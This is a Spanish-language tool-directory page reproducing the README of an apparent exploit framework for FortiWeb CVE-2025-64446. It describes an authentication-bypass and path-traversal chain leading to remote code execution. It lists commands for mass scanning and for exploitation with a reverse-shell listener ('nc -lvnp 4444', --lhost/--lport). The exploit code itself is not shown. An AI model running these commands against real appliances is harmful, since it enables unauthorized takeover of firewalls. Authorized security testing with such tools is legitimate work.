Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — Herramienta de investigación de seguridad para la vulnerabilidad CVE-2025-64446 de FortiWeb. Marco de explotación automatizado con registro avanzado, métricas en tiempo real, depuración de proxy e informes profesionales. Incluye lógica de reintento, multiproceso y ajustes configurables. Solo para pruebas de seguridad autorizadas. CVSS 9.8 Crítico. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

Ver Repositorio
14hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Herramienta de investigación de seguridad para la vulnerabilidad CVE-2025-64446 de FortiWeb. Marco de explotación automatizado con registro avanzado, métricas en tiempo real, depuración de proxy e informes profesionales. Incluye lógica de reintento, multiproceso y ajustes configurables. Solo para pruebas de seguridad autorizadas. CVSS 9.8 Crítico.

Compartir

FortiWeb CVE-2025-64446 Exploit de RCE

Python License CVSS CVE Status Version

Marco profesional de investigación de seguridad y evaluación de vulnerabilidades

Instalación · Inicio rápido · Uso · Arquitectura · Referencia de CLI · Aviso legal


Descripción general

FortiWeb Research Tool es un marco de evaluación en Python para la detección y análisis autorizados de CVE-2025-64446, un problema crítico de ejecución remota de código sin autenticación previa que afecta a los dispositivos FortiWeb Web Application Firewall.

AtributoDetalle
AutorSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (Crítico)
ClaseOmisión de autenticación + path traversal → subida arbitraria de archivos → RCE
AfectadosVersiones anteriores a 7.6.7 / 7.8.7 / 8.0.2 (verifique según el aviso oficial)
MitigaciónActualizar a una versión de FortiWeb parcheada
LenguajePython 3.7+
Punto de entradaexploit.py

Capacidades principales

ModoOpción(es)Propósito
Detección--detect-onlyIndicadores de vulnerabilidad sin explotación
Seguro / solo lectura--safe-modeOmitir pasos de explotación que modifican el estado
Escaneo masivo--targets + --scan-modeEvaluación paralela de múltiples objetivos
Explotación--target + --lhostCadena controlada solo en laboratorios autorizados
Ejecución en seco--dry-runEjecutar el flujo sin aplicar cambios
Informes--output-dirInformes de la evaluación en JSON + HTML

Resumen de la vulnerabilidad

CampoValor
ID de CVECVE-2025-64446
Puntuación CVSS9.8 (Crítico)
ImpactoCompromiso total del sistema cuando se explota con éxito
CorrecciónActualizar a 7.6.7, 7.8.7, 8.0.2 o posterior

Confirme siempre las versiones afectadas/corregidas contra el PSIRT de Fortinet antes de definir el alcance de la evaluación.


📸 Capturas de pantalla

UsoResultados del escaneo
PanelResultados del escaneo
Salida HTML
Salida de terminal

Instalación

git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

Dependencias

PaqueteFunción
requests, urllib3Cliente HTTP
rich, colorama, tqdmInterfaz de terminal y progreso
pyyamlCarga de config.yaml

Opcionales (desarrollo): pytest, black, flake8, mypy, python-dotenv — consulte requirements.txt.


Inicio rápido

# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

Nota: El modo de explotación requiere --lhost. Use --detect-only o --safe-mode cuando no tenga intención de ejecutar la cadena completa.


Guía de uso

Modo de detección

python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

La detección evalúa la accesibilidad, las pistas de versión, la exposición de la API, los indicadores de path traversal, las señales de omisión de autenticación y la accesibilidad del endpoint de subida. El riesgo se clasifica como Crítico / Alto / Medio / Bajo a partir de esos indicadores.

Escaneo masivo

cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager ejecuta los workers de FortiWebScanner mediante un pool de hilos, imprime una tabla resumen de Rich y escribe scan_report.json / scan_report.html.

Modo de explotación (solo laboratorios autorizados)

# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

Archivo de configuración

# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

Las opciones de CLI sobrescriben los valores cargados desde YAML.


Arquitectura

exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
ComponenteResponsabilidad
FortiWebScannerComprobaciones de accesibilidad, versión e indicadores CVE
ScannerManagerEscaneos paralelos, resúmenes JSON/HTML, tabla resumen
FortiWebExploitSesión basada en configuración, reintentos, métricas, informes y ruta de explotación opcional
LogManagerRegistro estructurado en archivos y consola con colores

Flujo general para un solo objetivo:

Descargar herramienta